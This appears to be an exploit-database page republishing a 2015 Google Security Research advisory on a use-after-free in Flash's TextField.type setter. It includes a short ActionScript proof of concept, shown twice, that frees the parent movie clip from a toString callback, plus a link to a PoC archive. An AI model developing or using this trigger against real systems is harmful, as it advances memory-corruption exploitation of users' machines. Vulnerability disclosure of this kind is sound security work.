header-logo
Suggest Exploit
vendor:
N/A
by:
Google Security Research
7,5
CVSS
HIGH
Use-after-free
416
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

Use-after-free in TextField.type setter

There is a use-after-free in the TextField.type setter. If the type the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows: var mc = this.createEmptyMovieClip('mc', 101); var tf = mc.createTextField('tf', 102, 1, 1, 100, 100); tf.type = {toString : func}; function func(){ mc.removeMovieClip(); // Fix heap here return 'input'; } A sample swf and fla are attached.

Mitigation:

The user should ensure that the type of the TextField is not set to an object with toString defined.
Source

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=577

There is a use-after-free in the TextField.type setter. If the type the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.type = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "input";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39052.zip

Navigation

Suggest Exploit

Services By CQR